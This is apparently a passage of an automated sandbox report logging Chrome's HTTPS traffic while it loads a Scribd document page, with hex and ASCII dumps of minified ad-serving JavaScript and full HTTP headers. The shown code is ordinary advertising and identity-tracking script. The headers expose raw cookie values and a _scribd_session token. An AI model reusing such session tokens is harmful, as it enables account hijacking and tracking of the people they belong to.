                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC16384INData Raw: 28 72 29 26 26 72 2e 6c 65 6e 67 74 68 3e 31 30 26 26 28 6e 5b 65 5d 3d 72 2e 73 6c 69 63 65 28 30 2c 31 30 29 29 7d 72 65 74 75 72 6e 20 6e 65 77 20 73 43 28 6e 29 7d 28 7b 73 6f 75 72 63 65 45 76 65 6e 74 3a 65 7d 29 2c 45 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 2c 72 2c 6f 2c 69 3b 63 6f 6e 73 74 20 73 3d 64 62 2e 65 6d 70 74 79 28 29 2e 61 64 64 28 22 64 74 73 74 6d 70 22 2c 65 2e 74 69 6d 65 73 74 61 6d 70 2e 67 65 74 54 69 6d 65 28 29 29 3b 73 77 69 74 63 68 28 65 2e 69 6e 74 65 67 72 61 74 69 6f 6e 2e 74 79 70 65 29 7b 63 61 73 65 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 3a 73 2e 61 64 64 4f 70 74 69 6f 6e 61 6c 28 22 61 69 64 22 2c 65 2e 69 6e 74 65 67 72 61 74 69 6f 6e 2e 61 70 70 49 64 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 64
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (r)&&r.length>10&&(n[e]=r.slice(0,10))}return new sC(n)}({sourceEvent:e}),E=function(e){var t,n,r,o,i;const s=db.empty().add("dtstmp",e.timestamp.getTime());switch(e.integration.type){case"application":s.addOptional("aid",e.integration.appId);break;case"d
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC7687INData Raw: 69 64 35 3a 6e 2c 6c 69 6e 6b 54 79 70 65 3a 72 7d 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 74 2e 6c 6f 67 67 65 72 2e 65 72 72 6f 72 28 6e 65 77 20 6e 78 28 65 29 29 7d 6e 3d 21 30 7d 65 6c 73 65 20 79 69 65 6c 64 20 6e 65 77 20 65 6d 28 28 74 3d 3e 73 65 74 54 69 6d 65 6f 75 74 28 74 2c 65 29 29 29 7d 29 29 2c 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 74 68 69 73 2e 69 64 35 43 6f 6c 6c 65 63 74 69 6f 6e 45 6e 61 62 6c 65 64 7c 7c 28 74 68 69 73 2e 69 64 35 43 6f 6c 6c 65 63 74 69 6f 6e 45 6e 61 62 6c 65 64 3d 21 30 2c 74 68 69 73 2e 6c 6f 67 67 65 72 2e 69 6e 66 6f 28 22 53 63 68 65 64 75 6c 69 6e 67 20 69 64 35 20 63 6f 6c 6c 65 63 74 69 6f 6e 22 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 61 70 70 6c 79 28 74 68 69 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: id5:n,linkType:r})}))}catch(e){t.logger.error(new nx(e))}n=!0}else yield new em((t=>setTimeout(t,e)))})),n.apply(this,arguments)}this.id5CollectionEnabled||(this.id5CollectionEnabled=!0,this.logger.info("Scheduling id5 collection"),function(){n.apply(this


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        27192.168.2.1649745151.101.130.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:25 UTC374OUTGET /webpack/doc_page/245.799c3a.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC578INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 2452573
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 19:31:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "a440e0545e5a5146f10f90df2ea13a56"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Age: 6
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740030-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522366.968610,VS0,VE5
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 34 35 5d 2c 7b 34 31 30 33 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 38 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 28 6e 75 6c 6c 3d 3d 74 7c 7c 74 3e 65 2e 6c 65 6e 67 74 68 29 26 26 28 74 3d 65 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 6e 65 77 20 41 72 72 61 79 28 74 29 3b 6e 3c 74 3b 6e 2b 2b 29 72 5b 6e 5d 3d 65 5b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[245],{41033:(e,t,n)=>{e.exports=function(){var e={228:function(e){e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 72 6e 20 65 2e 65 78 70 6f 72 74 73 3d 74 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 7d 2c 74 28 6e 29 7d 65 2e 65 78 70 6f 72 74 73 3d 74 7d 2c 32 30 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 34 38 39 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: rn e.exports=t=Object.setPrototypeOf?Object.getPrototypeOf:function(e){return e.__proto__||Object.getPrototypeOf(e)},t(n)}e.exports=t},205:function(e,t,n){var r=n(489);e.exports=function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super ex
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 65 2e 65 78 70 6f 72 74 73 3d 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 7d 3a 65 2e 65 78 70 6f 72 74 73 3d 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c 74 28 6e 29 7d 65 2e 65 78 70 6f 72 74 73 3d 74 7d 2c 33 37 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 32 32 38 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: of Symbol.iterator?e.exports=t=function(e){return typeof e}:e.exports=t=function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},t(n)}e.exports=t},379:function(e,t,n){var r=n(228);e.exports=function(
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 6a 65 63 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 6b 3d 6e 65 77 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 75 28 29 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 70 61 67 65 4b 65 79 56 61 6c 75 65 50 61 69 72 73 3d 7b 7d 2c 74 68 69 73 2e 6d 61 70 70 69 6e 67 43 6f 6e 66 69 67 3d 7b 7d 2c 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 73 3d 5b 5d 2c 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ject(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var k=new(function(){function e(){u()(this,e),this.pageKeyValuePairs={},this.mappingConfig={},this.keyValueConfigMappings=[],this.keyValueConfigMappi
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 73 2e 6c 6f 61 64 65 64 29 7b 65 2e 6e 65 78 74 3d 32 33 3b 62 72 65 61 6b 7d 69 66 28 74 68 69 73 2e 6c 6f 61 64 65 64 3d 77 69 6e 64 6f 77 2e 66 72 65 65 73 74 61 72 52 65 61 63 74 43 6f 6d 70 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 3d 21 30 2c 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 4c 6f 63 61 74 69 6f 6e 3d 6e 2c 61 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 22 66 73 64 65 62 75 67 22 29 3e 2d 31 3f 22 2f 71 61 22 3a 22 22 2c 6f 3d 22 68 74 74 70 73 3a 2f 2f 61 2e 70 75 62 2e 6e 65 74 77 6f 72 6b 2f 22 2e 63 6f 6e 63 61 74 28 74 29 2e 63 6f 6e 63 61 74 28 61 2c 22 2f 70 75 62 66 69 67 2e 6d 69 6e 2e 6a 73 22 29 2c 77 69 6e 64 6f 77 2e 66 72 65 65 73 74 61 72 3d 77
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s.loaded){e.next=23;break}if(this.loaded=window.freestarReactCompontentLoaded=!0,this.keyValueConfigMappingLocation=n,a=window.location.search.indexOf("fsdebug")>-1?"/qa":"",o="https://a.pub.network/".concat(t).concat(a,"/pubfig.min.js"),window.freestar=w
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 69 66 28 72 3d 4f 28 4f 28 7b 7d 2c 74 68 69 73 2e 70 61 67 65 4b 65 79 56 61 6c 75 65 50 61 69 72 73 29 2c 6e 29 2c 21 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 4c 6f 63 61 74 69 6f 6e 7c 7c 30 21 3d 3d 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 73 2e 6c 65 6e 67 74 68 29 7b 65 2e 6e 65 78 74 3d 35 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 3d 34 2c 74 68 69 73 2e 66 65 74 63 68 4b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 28 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 4c 6f 63 61 74 69 6f 6e 29 3b 63 61 73 65 20 34 3a 74 68 69 73 2e 6b 65 79 56
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: h(e.prev=e.next){case 0:if(r=O(O({},this.pageKeyValuePairs),n),!this.keyValueConfigMappingLocation||0!==this.keyValueConfigMappings.length){e.next=5;break}return e.next=4,this.fetchKeyValueConfigMapping(this.keyValueConfigMappingLocation);case 4:this.keyV
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 68 69 73 2e 6e 65 77 41 64 53 6c 6f 74 51 75 65 75 65 3d 5b 5d 2c 65 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 64 55 6e 69 74 50 61 74 68 3f 28 65 2e 64 69 72 65 63 74 47 61 6d 41 64 73 2e 70 75 73 68 28 74 29 2c 65 29 3a 74 2e 63 68 61 6e 6e 65 6c 3f 28 65 2e 63 68 61 6e 6e 65 6c 41 64 4d 61 70 5b 74 2e 63 68 61 6e 6e 65 6c 5d 7c 7c 28 65 2e 63 68 61 6e 6e 65 6c 41 64 4d 61 70 5b 74 2e 63 68 61 6e 6e 65 6c 5d 3d 5b 5d 29 2c 65 2e 63 68 61 6e 6e 65 6c 41 64 4d 61 70 5b 74 2e 63 68 61 6e 6e 65 6c 5d 2e 70 75 73 68 28 7b 73 6c 6f 74 49 64 3a 74 2e 73 6c 6f 74 49 64 2c 70 6c 61 63 65 6d 65 6e 74 4e 61 6d 65 3a 74 2e 70 6c 61 63 65 6d 65 6e 74 4e 61 6d 65 2c 74 61 72 67 65 74 69 6e 67 3a 74 2e 74 61 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: his.newAdSlotQueue=[],e.reduce((function(e,t){return t.adUnitPath?(e.directGamAds.push(t),e):t.channel?(e.channelAdMap[t.channel]||(e.channelAdMap[t.channel]=[]),e.channelAdMap[t.channel].push({slotId:t.slotId,placementName:t.placementName,targeting:t.tar
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 64 65 66 69 6e 65 53 69 7a 65 4d 61 70 70 69 6e 67 28 61 29 7d 65 2e 74 61 72 67 65 74 69 6e 67 26 26 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 65 2e 74 61 72 67 65 74 69 6e 67 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 49 28 29 28 65 2c 32 29 2c 72 3d 74 5b 30 5d 2c 61 3d 74 5b 31 5d 3b 6e 2e 73 65 74 54 61 72 67 65 74 69 6e 67 28 72 2c 61 29 7d 29 29 2c 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 2e 64 69 73 70 6c 61 79 28 6e 29 2c 72 2e 70 75 73 68 28 6e 29 2c 74 2e 61 64 53 6c 6f 74 73 4d 61 70 5b 6e 2e 67 65 74 41 64 55 6e 69 74 50 61 74 68 28 29 5d 3d 6e 7d 29 29 2c 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 2e 70 75 62 61 64 73 28 29 2e 72 65 66 72 65 73 68 28 72 29 2c 65 2e 66 6f 72 45 61 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: defineSizeMapping(a)}e.targeting&&Object.entries(e.targeting).forEach((function(e){var t=I()(e,2),r=t[0],a=t[1];n.setTargeting(r,a)})),window.googletag.display(n),r.push(n),t.adSlotsMap[n.getAdUnitPath()]=n})),window.googletag.pubads().refresh(r),e.forEac
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 72 65 66 72 65 73 68 41 64 53 6c 6f 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 61 29 7b 76 61 72 20 6f 3d 74 68 69 73 3b 74 68 69 73 2e 6c 6f 67 28 30 2c 22 52 65 66 72 65 73 68 69 6e 67 20 41 64 20 73 6c 6f 74 20 5b 22 2e 63 6f 6e 63 61 74 28 74 2c 22 5d 22 29 29 2c 77 69 6e 64 6f 77 2e 66 72 65 65 73 74 61 72 2e 71 75 65 75 65 2e 70 75 73 68 28 73 28 29 28 69 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 69 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 69 2e 70 72 65 76 3d 69 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 69 66 28 61 29 7b 69 2e 6e 65 78 74 3d 37 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 69 2e 6e 65 78 74 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: refreshAdSlot",value:function(e,t,n,r,a){var o=this;this.log(0,"Refreshing Ad slot [".concat(t,"]")),window.freestar.queue.push(s()(i().mark((function s(){return i().wrap((function(i){for(;;)switch(i.prev=i.next){case 0:if(a){i.next=7;break}return i.next=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 62 6c 65 64 22 29 29 2c 21 31 3d 3d 3d 65 26 26 21 30 3d 3d 3d 74 68 69 73 2e 71 75 65 75 65 26 26 74 68 69 73 2e 66 6c 75 73 68 51 75 65 75 65 64 4e 65 77 41 64 53 6c 6f 74 73 28 29 2c 74 68 69 73 2e 71 75 65 75 65 3d 65 7d 7d 5d 29 2c 65 7d 28 29 29 2c 6a 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 28 29 28 6f 2c 65 29 3b 76 61 72 20 74 2c 6e 2c 72 2c 61 3d 28 6e 3d 6f 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 7c 7c 21 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 29 72 65 74 75 72 6e 21 31 3b 69 66 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bled")),!1===e&&!0===this.queue&&this.flushQueuedNewAdSlots(),this.queue=e}}]),e}()),j=function(e){f()(o,e);var t,n,r,a=(n=o,r=function(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        28192.168.2.1649746151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:25 UTC1493OUTPOST /csrf_token HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/document/801519291/Advice-Notification
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:25 UTC94OUTData Raw: 7b 22 68 72 65 66 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 63 72 69 62 64 2e 63 6f 6d 2f 64 6f 63 75 6d 65 6e 74 2f 38 30 31 35 31 39 32 39 31 2f 41 64 76 69 63 65 2d 4e 6f 74 69 66 69 63 61 74 69 6f 6e 23 66 75 6c 6c 73 63 72 65 65 6e 26 66 72 6f 6d 5f 65 6d 62 65 64 22 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"href":"https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed"}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1371INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, private, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                                        Etag: W/"1af84ff93aefb7130449ab9cbdd8cd4d"
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: _scribd_session=UlVnZzY0RlR0NVF3UmNaZmRmN3ZFUENkeTRERFQ2UzlnOFB4NmxkZFo4RDMzMVdrWjdJWlZZdHhkNVZEbGx0ZG5xRFBWSnpJOGxIYkgwcjl3SHlSZG5SKzhmRG03M2MzUUFBdEVNZ3RNbkpkcGdRMFgzSHQzcU1RUGtQZldweUtZOEt5OW1OWS9TNnlFSlliWkdBUWF4V1dVUytsWFdSaHdjSURhaEQ0d3NVL3RTTUNyK0JhZU1ZSE40R2xQa0h2cUxwaExacDd1eWovR09ZV2dsd3kwZEtzWmFld1Q4eW9qc0tSM3pWNmxHdzk5ZHRWZFVqdGloZEdDRjIxVGx2TXpHU25PbGhKRURKUDg4ank2ckxiT3BDTUdIM0U1MHFwOUV4UHJSSkVzbFdQdStyMGgxQzQyTXpkUU9QSWhrcFQtLVVvYklTUjZmYWJqSThGbzdVUlRTN2c9PQ%3D%3D--a57245b927d8f6e851d3853f71018b5eeaa4013c; domain=.scribd.com; path=/; expires=Mon, 06 Dec 2027 21:59:25 GMT; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 4
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: 24e31d4ef3ba3acfed65efa574f35c416e413c746712dd92c9f58aa9801dbeba
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.002321
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740064-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522366.974100,VS0,VE31
